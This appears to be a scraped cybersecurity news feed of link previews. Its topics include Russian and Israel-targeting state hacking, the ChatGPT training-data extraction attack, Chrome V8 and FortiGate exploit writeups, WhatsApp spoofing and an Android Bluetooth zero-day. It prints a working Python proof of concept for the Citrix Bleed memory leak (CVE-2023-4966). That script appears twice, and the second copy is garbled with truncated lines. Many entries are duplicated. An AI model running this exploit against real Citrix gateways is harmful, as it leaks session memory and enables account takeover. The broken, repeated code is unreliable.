ISRAEL GAZA CONFLICT THE CYBER PERSPECTIVE.pdf
1.8 MB
Documentation of cyber activity amid the Israel Palestine war.
Russian state hackers spread USB worm worldwide.
LitterDrifter worm has been traced back to Russia’s Federal Security Service.
Malware Spotlight – Into the Trash: Analyzing LitterDrifter
https://research.checkpoint.com/2023/malware-spotlight-into-the-trash-analyzing-litterdrifter/
https://www.independent.co.uk/tech/russian-state-hackers-spread-usb-worm-worldwide-b2451776.html
LitterDrifter worm has been traced back to Russia’s Federal Security Service.
Malware Spotlight – Into the Trash: Analyzing LitterDrifter
https://research.checkpoint.com/2023/malware-spotlight-into-the-trash-analyzing-litterdrifter/
https://www.independent.co.uk/tech/russian-state-hackers-spread-usb-worm-worldwide-b2451776.html
Check Point Research
Malware Spotlight - Into the Trash: Analyzing LitterDrifter - Check Point Research
Introduction Gamaredon, also known as Primitive Bear, ACTINIUM, and Shuckworm, is a unique player in the Russian espionage ecosystem that targets a wide variety of almost exclusively Ukrainian entities. While researchers often struggle to uncover evidence…
Shadowy hacking group targeting Israel shows outsized capabilities. Islarel Palestine conflict.
A sophisticated campaign that has targeted Israel for at least 8 years shows evidence of improving its capabilities.
https://cyberscoop.com/hacking-israel-wild-card/
A sophisticated campaign that has targeted Israel for at least 8 years shows evidence of improving its capabilities.
https://cyberscoop.com/hacking-israel-wild-card/
CyberScoop
Shadowy hacking group targeting Israel shows outsized capabilities
A sophisticated campaign that has targeted Israel for at least 8 years shows evidence of improving its capabilities.
Google Researchers’ Attack Prompts ChatGPT to Reveal Its Training Data.
https://www.404media.co/google-researchers-attack-convinces-chatgpt-to-reveal-its-training-data/
https://www.404media.co/google-researchers-attack-convinces-chatgpt-to-reveal-its-training-data/
404 Media
Google Researchers’ Attack Prompts ChatGPT to Reveal Its Training Data
ChatGPT is full of sensitive private information and spits out verbatim text from CNN, Goodreads, WordPress blogs, fandom wikis, Terms of Service agreements, Stack Overflow source code, Wikipedia pages, news blogs, random internet comments, and much more.
Google Chrome V8 ArrayShift Race Condition Remote Code Execution.
https://blog.exodusintel.com/2023/05/16/google-chrome-v8-arrayshift-race-condition-remote-code-execution/
https://blog.exodusintel.com/2023/05/16/google-chrome-v8-arrayshift-race-condition-remote-code-execution/
Exodus Intelligence
Google Chrome V8 ArrayShift Race Condition Remote Code Execution - Exodus Intelligence
By Javier Jimenez Overview This post describes a method of exploiting a race condition in the V8 JavaScript engine, version 9.1.269.33. The vulnerability affects the following versions of Chrome and Edge: Google Chrome versions between 90.0.4430.0 and 91.0.4472.100.…
Reuters
How an Indian startup hacked the world
Appin was a leading Indian cyberespionage firm that few people even knew existed. A Reuters investigation found that the company grew from an educational startup to a hack-for-hire powerhouse that stole secrets from business titans, politicians, military…
Indian government asks Reuters news agency 📰 to take down an article titled "How an Indian startup hacked the world 🌍"
Reuters had published the article and removed it after the Indian court order.
Reuters released the details about this: https://www.reuters.com/investigates/special-report/usa-hackers-appin/
It is likely that the article mentioned criminal activity by the startup that involved people in power and access.
Reuters had published the article and removed it after the Indian court order.
Reuters released the details about this: https://www.reuters.com/investigates/special-report/usa-hackers-appin/
It is likely that the article mentioned criminal activity by the startup that involved people in power and access.
How an Indian startup (Appin) hacked the world 🌍
https://web.archive.org/web/20231117025741/https://www.reuters.com/investigates/special-report/usa-hackers-appin/
https://web.archive.org/web/20231117025741/https://www.reuters.com/investigates/special-report/usa-hackers-appin/
Reuters
How an Indian startup hacked the world
Appin was a leading Indian cyberespionage firm that few people even knew existed. A Reuters investigation found that the company grew from an educational startup to a hack-for-hire powerhouse that stole secrets from business titans, politicians, military…
Unmasking the Enigma: A Historical Dive into the World of PlugX Malware.
https://www.splunk.com/en_us/blog/security/unmasking-the-enigma-a-historical-dive-into-the-world-of-plugx-malware.html
https://www.splunk.com/en_us/blog/security/unmasking-the-enigma-a-historical-dive-into-the-world-of-plugx-malware.html
Splunk
Unmasking the Enigma: A Historical Dive into the World of PlugX Malware | Splunk
The Splunk Threat Research Team (STRT) unravels the mystery of a PlugX variant, peeling back the layers of its payload, tactics, and impact on the digital realm.
Whatsapp Spoofing impersonate of reply message
All official WhatsApp clients, upon receiving a "Message Reply" payload (QuotedMessage), do not validate whether the "ContextInfo" of this "QuotedMessage" is valid/exists ("StanzaId" and "Participant"). This allows a malicious actor to send in private chats or groups a "QuotedMessage" of a message that never existed on behalf of another person. This is highly critical and dangerous.
https://github.com/lichti/whats-spoofing
PoC: https://youtu.be/_WL6hpAvNh8
All official WhatsApp clients, upon receiving a "Message Reply" payload (QuotedMessage), do not validate whether the "ContextInfo" of this "QuotedMessage" is valid/exists ("StanzaId" and "Participant"). This allows a malicious actor to send in private chats or groups a "QuotedMessage" of a message that never existed on behalf of another person. This is highly critical and dangerous.
https://github.com/lichti/whats-spoofing
PoC: https://youtu.be/_WL6hpAvNh8
Bad Zip and new Packer for Android/BianLian.
https://cryptax.medium.com/bad-zip-and-new-packer-for-android-bianlian-5bdad4b90aeb
https://cryptax.medium.com/bad-zip-and-new-packer-for-android-bianlian-5bdad4b90aeb
Medium
Bad Zip and new Packer for Android/BianLian
I got my hands on a new sample of Android/BianLian (sha256: 0070bc10699a982a26f6da48452b8f5e648e1e356a7c1667f393c5c3a1150865), a banking…
Inside The ‘Magic Radio’ Protecting Russian Drones From Jamming.
https://t.me/StavBPLA/195
https://www.forbes.com/sites/davidhambling/2023/12/20/inside-the-magic-radio-protecting-russian-drones-from-jamming/
https://t.me/StavBPLA/195
https://www.forbes.com/sites/davidhambling/2023/12/20/inside-the-magic-radio-protecting-russian-drones-from-jamming/
Telegram
Школа БПЛА Ставрополь
**Соскучились по техничке**⁉️
Сегодня познакомим вас с комплектом помехозащищенной связи «Гермес»
Фото 1-приёмник
Фото 2-передатчик
Фото 3-ретранслятор
Что я могу сказать резюмируя:они хороши вот прям хороши.
1)**Широкий диапазон частот** В котором можно…
Сегодня познакомим вас с комплектом помехозащищенной связи «Гермес»
Фото 1-приёмник
Фото 2-передатчик
Фото 3-ретранслятор
Что я могу сказать резюмируя:они хороши вот прям хороши.
1)**Широкий диапазон частот** В котором можно…
Exploring Hell's Gate.
Hell's Gate makes it possible to execute direct syscalls based on dynamically retrieving the required SSNs via a combination of walking the Process Environment Block (PEB), parsing the Export Address Table (EAT) from ntdll.dll, opcode comparison from the syscall stub of the native functions and extracting the SSNs.
https://redops.at/en/blog/exploring-hells-gate
Hell's Gate makes it possible to execute direct syscalls based on dynamically retrieving the required SSNs via a combination of walking the Process Environment Block (PEB), parsing the Export Address Table (EAT) from ntdll.dll, opcode comparison from the syscall stub of the native functions and extracting the SSNs.
https://redops.at/en/blog/exploring-hells-gate
RedOps - English
Exploring Hell's Gate - RedOps
OPSWAT
Advanced Network Detection & Response - MetaDefender NDR - OPSWAT
Our Network Detection and Response is purpose-built to help your SOC team operate at peak efficiency. Talk to an expert about MetaDefender NDR today.
■■■□□ An Introduction to Deep File Inspection® (DFI).
https://inquest.net/blog/an-introduction-to-deep-file-inspection/
https://inquest.net/blog/an-introduction-to-deep-file-inspection/
WMIProcessWatcher: A CIA tradecraft technique to asynchronously detect when a process is created using WMI.
https://github.com/hackerhouse-opensource/WMIProcessWatcher
https://github.com/hackerhouse-opensource/WMIProcessWatcher
GitHub
GitHub - hackerhouse-opensource/WMIProcessWatcher: A CIA tradecraft technique to asynchronously detect when a process is created…
A CIA tradecraft technique to asynchronously detect when a process is created using WMI. - hackerhouse-opensource/WMIProcessWatcher
Building an Exploit for FortiGate Vulnerability CVE-2023-27997.
https://bishopfox.com/blog/building-exploit-fortigate-vulnerability-cve-2023-27997
https://bishopfox.com/blog/building-exploit-fortigate-vulnerability-cve-2023-27997
Bishop Fox
Building an Exploit for FortiGate Vulnerability CVE-2023-27997
Learn how Bishop Fox built a POC exploit for the pre-authentication remote code injection vulnerability in the Fortinet SSL VPN published by Lexfo.
Citrix Bleed Zero-Day CVE-2023-4966 by AssetNote team.
#!/usr/bin/env python3
import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200 )')
args = parser.parse_args()
if args.target is None:
print('Target must be provided (e.g. --target 192.168.1.200 )')
sys.exit(0)
hostname = args.target
if name == "main":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")
import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g.
args = parser.parse_args()
if
print('Target must be provided (e.g. --target
sys.exit(0)
hostname =
if name == "main":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")
Zero-Day: CVE-2023-45866 and CVE-2024-21306 exploitation.
Exploiting 0-click Android Bluetooth vulnerability to inject keystrokes without pairing.
https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/
https://youtu.be/dj1lGqL8lXo
Exploiting 0-click Android Bluetooth vulnerability to inject keystrokes without pairing.
https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/
https://youtu.be/dj1lGqL8lXo
Mobile Hacker
Exploiting 0-click Android Bluetooth vulnerability to inject keystrokes without pairing Mobile Hacker
[update 2024-02-19] This vulnerability can be even used to remotely wipe data of targeted Android smartphone. Using this vulnerability it is possible to guess user lock screen PIN. After five incorrect PINs device is locked out for 30 seconds. This operation…